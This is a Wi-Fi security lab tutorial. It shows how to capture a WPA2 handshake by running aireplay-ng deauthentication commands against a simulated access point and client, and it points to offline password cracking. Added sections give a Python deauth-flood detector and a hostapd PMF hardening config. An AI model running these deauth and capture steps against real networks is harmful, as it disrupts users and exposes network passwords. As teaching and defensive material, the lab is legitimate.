Introduction
Welcome to this lab on forcing a WPA handshake capture. The WPA/WPA2 four-way handshake is a critical piece of data required to attempt to crack a Wi-Fi network's password. While you can passively wait for a device to connect to the network to capture this handshake, this can be time-consuming.
A more active approach is to force a currently connected client to disconnect and then immediately reconnect. This process is called a deauthentication (or "deauth") attack. When the client reconnects, it performs the four-way handshake, which you can then capture.
In this lab, you will use aireplay-ng, a powerful tool from the aircrack-ng suite, to perform a deauthentication attack against a simulated Wi-Fi client. This will allow you to reliably capture the WPA handshake for analysis. Our lab environment has been pre-configured with a virtual wireless access point (AP) named MyTestAP and a connected client.
Identify an Associated Client from an airodump-ng Scan
In this step, you will prepare your wireless interface for monitoring and then use airodump-ng to find the target access point and its connected client.
First, you need to put one of your virtual wireless interfaces into monitor mode. This mode allows the interface to capture all Wi-Fi traffic in the air, not just traffic addressed to it. We will use the wlan1 interface.
Execute the following command to start monitor mode on wlan1:
sudo airmon-ng start wlan1
This command will create a new monitor interface, typically named wlan1mon. You should see output confirming the mode has been enabled.
PHY Interface Driver Chipset
phy0 wlan0 mac80211_hwsim Software simulator
phy1 wlan1 mac80211_hwsim Software simulator
(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
(mac80211 station mode vif disabled for [phy1]wlan1)
Now, run airodump-ng on the new monitor interface (wlan1mon) to start scanning. We will use the -w flag to write the captured packets to a file named capture, and we'll specify the BSSID and channel of our target AP to focus the scan. The BSSID for our simulated AP is 02:00:00:00:01:00 and it's on channel 6.
sudo airodump-ng -w capture --bssid 02:00:00:00:01:00 -c 6 wlan1mon
Let airodump-ng run. You will see a screen that updates in real-time. The top part lists nearby access points, and the bottom part lists clients connected to them. You should see our AP, MyTestAP, and one client connected to it.
The output will look similar to this:
CH 6 ][ Elapsed: 10 s ][ 2023-10-27 10:30
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:00:00:00:01:00 -30 10 5 0 6 540 WPA2 CCMP PSK MyTestAP
BSSID STATION PWR Rate Lost Frames Probe
02:00:00:00:01:00 02:00:00:00:02:00 -35 0- 1 0 5
From this output, identify and note:
- BSSID: 02:00:00:00:01:00 (the MAC address of the AP).
- STATION: 02:00:00:00:02:00 (the MAC address of the connected client).
Keep this terminal running. You will need it to confirm the handshake capture later.
Open a New Terminal for the Deauthentication Attack
In this step, you will open a new terminal window. The airodump-ng command from the previous step must continue running in the first terminal to listen for the WPA handshake. The deauthentication attack will be launched from a second, separate terminal.
To open a new terminal, click the + icon in the terminal tab bar at the top of the terminal window.

Once the new terminal is open, you will be at the ~/project directory, ready to execute the attack command in the next step. All subsequent commands for the attack itself should be run in this new terminal.
Construct the aireplay-ng Deauth Command with --deauth
In this step, you will construct the aireplay-ng command that will perform the deauthentication attack. You will use the information you gathered in Step 1.
The basic syntax for a deauth attack with aireplay-ng is:
aireplay-ng --deauth <number_of_packets> -a <AP_BSSID> -c <Client_STATION> <interface>
Let's break down the components:
- --deauth: This flag specifies the deauthentication attack mode.
- <number_of_packets>: This is the number of deauth packets to send. Sending a small burst, like 5, is usually sufficient to disconnect the client.
- -a <AP_BSSID>: This specifies the MAC address of the target Access Point. From Step 1, this is 02:00:00:00:01:00.
- -c <Client_STATION>: This specifies the MAC address of the client you want to disconnect. From Step 1, this is 02:00:00:00:02:00.
- <interface>: This is your wireless interface in monitor mode, which is wlan1mon.
Now, assemble the full command in your new terminal. It should look exactly like this:
sudo aireplay-ng --deauth 5 -a 02:00:00:00:01:00 -c 02:00:00:00:02:00 wlan1mon
Do not press Enter yet. In the next step, you will execute this command.
Execute the Attack Targeting the Client and AP
In this step, you will execute the command you just constructed to launch the attack.
In your second terminal window, press Enter to run the aireplay-ng command.
sudo aireplay-ng --deauth 5 -a 02:00:00:00:01:00 -c 02:00:00:00:02:00 wlan1mon
The tool will immediately start sending deauthentication packets. The output will show the time and that it is sending directed deauths to the client.
The output will look like this:
10:35:10 Waiting for beacon frame (BSSID: 02:00:00:00:01:00) on channel 6
10:35:10 Sending 64 directed DeAuths to 02:00:00:00:02:00 (code 7).
10:35:11 Sending 64 directed DeAuths to 02:00:00:00:02:00 (code 7).
...
The attack is very fast. As soon as you execute the command, the targeted client will be disconnected from the network and will immediately try to reconnect. This reconnection process is what generates the WPA handshake we want to capture.
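Seen from the network's side, the aireplay-ng output above is also the signature a wireless intrusion detection system keys on: a legitimate AP sends the occasional deauthentication frame, whereas this attack sends dozens to one station within a second. The following detector is an added example for this lab, not part of the original page or of the aircrack-ng suite. It assumes a constructed, simplified text log of management frames (one frame per line: timestamp, frame type, source, destination, optional reason code); the addresses reuse the lab's simulated AP and client, and the threshold and window values are assumptions to tune per environment.

```python
"""Flag deauthentication bursts in a simplified 802.11 frame log.

Added example for this lab, not part of the original page or of the
aircrack-ng suite. It assumes a constructed text log with one frame per line:

    <unix_time> <frame_type> <src_mac> <dst_mac> [<reason_code>]

A legitimate AP sends the occasional deauth; the attack in this lab sends
dozens to one station within a second, which is what a wireless IDS looks for.
"""
from collections import defaultdict, deque

THRESHOLD = 10   # deauth/disassoc frames to the same station ...
WINDOW = 1.0     # ... within this many seconds raises an alert (assumed values)

# Constructed sample log. Addresses mirror the lab's simulated AP
# (02:00:00:00:01:00) and client (02:00:00:00:02:00). The single deauth from
# a different pair (reason 3, "station is leaving") is normal behaviour.
SAMPLE_LOG = """\
1698402905.000 DEAUTH 02:00:00:00:03:00 02:00:00:00:04:00 3
1698402910.000 DATA   02:00:00:00:02:00 02:00:00:00:01:00
1698402910.100 DEAUTH 02:00:00:00:01:00 02:00:00:00:02:00 7
1698402910.150 DEAUTH 02:00:00:00:01:00 02:00:00:00:02:00 7
1698402910.200 DEAUTH 02:00:00:00:01:00 02:00:00:00:02:00 7
1698402910.250 DEAUTH 02:00:00:00:01:00 02:00:00:00:02:00 7
1698402910.300 DEAUTH 02:00:00:00:01:00 02:00:00:00:02:00 7
1698402910.350 DATA   02:00:00:00:02:00 02:00:00:00:01:00
1698402910.400 DEAUTH 02:00:00:00:01:00 02:00:00:00:02:00 7
1698402910.450 DEAUTH 02:00:00:00:01:00 02:00:00:00:02:00 7
1698402910.500 DEAUTH 02:00:00:00:01:00 02:00:00:00:02:00 7
1698402910.550 DEAUTH 02:00:00:00:01:00 02:00:00:00:02:00 7
1698402910.600 DEAUTH 02:00:00:00:01:00 02:00:00:00:02:00 7
1698402910.650 DEAUTH 02:00:00:00:01:00 02:00:00:00:02:00 7
1698402911.900 EAPOL  02:00:00:00:01:00 02:00:00:00:02:00
"""


def parse_frame(line):
    """Parse one log line; returns None for blank or malformed lines."""
    parts = line.split()
    if len(parts) < 4:
        return None
    try:
        ts = float(parts[0])
    except ValueError:
        return None
    reason = int(parts[4]) if len(parts) > 4 and parts[4].isdigit() else None
    return {"ts": ts, "type": parts[1].upper(),
            "src": parts[2].lower(), "dst": parts[3].lower(), "reason": reason}


def detect_deauth_bursts(lines, threshold=THRESHOLD, window=WINDOW):
    """Sliding-window count of deauth/disassoc frames per (src, dst) pair.

    Returns {(src, dst): {"first_ts", "last_ts", "count", "reason"}} for every
    pair that reached `threshold` frames inside some `window`-second span.
    """
    recent = defaultdict(deque)   # (src, dst) -> timestamps still in the window
    alerts = {}
    for line in lines:
        frame = parse_frame(line)
        if frame is None or frame["type"] not in ("DEAUTH", "DISASSOC"):
            continue
        key = (frame["src"], frame["dst"])
        times = recent[key]
        times.append(frame["ts"])
        while times and frame["ts"] - times[0] > window:
            times.popleft()           # drop frames that fell out of the window
        if len(times) >= threshold:
            alert = alerts.setdefault(
                key, {"first_ts": times[0], "reason": frame["reason"]})
            alert["last_ts"] = frame["ts"]   # keep extending while the burst lasts
            alert["count"] = len(times)
    return alerts


def format_alerts(alerts):
    """Render alerts as one human-readable line each."""
    return [f"deauth flood: {src} -> {dst}, {a['count']} frames in "
            f"{a['last_ts'] - a['first_ts']:.2f}s (reason {a['reason']})"
            for (src, dst), a in sorted(alerts.items())]


if __name__ == "__main__":
    for text in format_alerts(detect_deauth_bursts(SAMPLE_LOG.splitlines())):
        print(text)
```

The detector keys on the (source, destination) pair rather than on the source alone, because the forged frames carry the AP's own BSSID as source; what distinguishes them from normal AP behaviour is the rate to a single station, not the address. Reason code 7 ("class 3 frame received from nonassociated station") is the value aireplay-ng shows in the output above and is a useful secondary indicator, since a well-behaved AP rarely emits it in bulk.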
Quickly switch back to your first terminal (the one running airodump-ng) to observe the result in the next step.
Confirm Handshake Capture in the airodump-ng Window
In this step, you will confirm that the deauthentication attack was successful by checking for the WPA handshake message in your airodump-ng window.
Switch back to your first terminal. If the attack worked, you will see a new message in the top-right corner of the airodump-ng display:
WPA handshake: 02:00:00:00:01:00
This message confirms that airodump-ng has successfully intercepted and recorded the four-way handshake for the specified BSSID.
CH 6 ][ Elapsed: 45 s ][ 2023-10-27 10:35 ][ WPA handshake: 02:00:00:00:01:00
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:00:00:00:01:00 -30 48 82 1 6 540 WPA2 CCMP PSK MyTestAP
BSSID STATION PWR Rate Lost Frames Probe
02:00:00:00:01:00 02:00:00:00:02:00 -36 0- 1 0 75
Now that you have the handshake, you can stop the capture. Press Ctrl+C in the airodump-ng terminal to stop it.
Because you used the -w capture flag in Step 1, airodump-ng saved the captured traffic to files in your current directory (~/project). List the files to see the results.
ls -l
You should see several files starting with capture, including capture-01.cap. This .cap file contains the raw packet data, including the WPA handshake you just captured.
-rw-r--r-- 1 root root 450 Oct 27 10:36 capture-01.cap
-rw-r--r-- 1 root root 892 Oct 27 10:36 capture-01.csv
-rw-r--r-- 1 root root 634 Oct 27 10:36 capture-01.kismet.csv
-rw-r--r-- 1 root root 128 Oct 27 10:36 capture-01.kismet.netxml
-rw-r--r-- 1 labex labex 121 Oct 27 10:28 hostapd.conf
-rw-r--r-- 1 labex labex 52 Oct 27 10:28 wpa_supplicant.conf
The capture-01.cap file is the prize. It can now be used with password cracking tools like aircrack-ng to try and discover the network's pre-shared key.
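The hostapd.conf in the listing above is what drives the lab's simulated AP. The reason the deauth in this lab works at all is that, by default, 802.11 management frames are neither authenticated nor encrypted, so the client has no way to tell a forged deauthentication frame from a genuine one. The fix on the AP side is 802.11w Protected Management Frames (PMF). The fragment below is an added example of that hardening, not the lab's own hostapd.conf; the SSID, BSSID and channel are the values shown in this lab, while the interface name, driver and passphrase placeholder are assumptions.

```ini
# hostapd.conf fragment (added example, not the lab's own file).
# Assumed: interface, driver and passphrase placeholder. SSID, BSSID and
# channel are the values used in this lab.
interface=wlan0
driver=nl80211
ssid=MyTestAP
bssid=02:00:00:00:01:00
hw_mode=g
channel=6
wpa=2
wpa_passphrase=<REPLACE_WITH_STRONG_PASSPHRASE>
wpa_pairwise=CCMP
rsn_pairwise=CCMP

# Weak (default) setting: management frames are unprotected, so a spoofed
# deauth such as the one sent in this lab is honoured by the client.
# ieee80211w=0

# Hardened setting: PMF required. Deauthentication and disassociation frames
# must carry a valid MIC under the session key, so forged ones are discarded.
# Requires the SHA-256 key-management variant and PMF-capable clients; use
# ieee80211w=1 (optional) while legacy clients that lack PMF remain.
ieee80211w=2
wpa_key_mgmt=WPA-PSK WPA-PSK-SHA256
```

The client side must agree: in wpa_supplicant.conf the matching setting is `ieee80211w=2` inside the network block (or `pmf=2` globally). With PMF in force a forced reconnect no longer follows a spoofed deauth, so the handshake can only be captured when a client genuinely joins, and a strong, long passphrase is what then keeps the offline attack described below from succeeding.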
Summary
Congratulations on completing this lab! You have successfully performed a deauthentication attack to force and capture a WPA handshake.
In this lab, you learned how to:
- Put a wireless interface into monitor mode using airmon-ng.
- Scan for and identify a target AP and client with airodump-ng.
- Construct and execute a deauthentication attack using aireplay-ng.
- Confirm the capture of the WPA handshake and locate the resulting .cap file.
This is a fundamental skill in wireless network security testing. The captured handshake file is the key ingredient for the next phase: offline password cracking using a tool like aircrack-ng and a comprehensive wordlist.
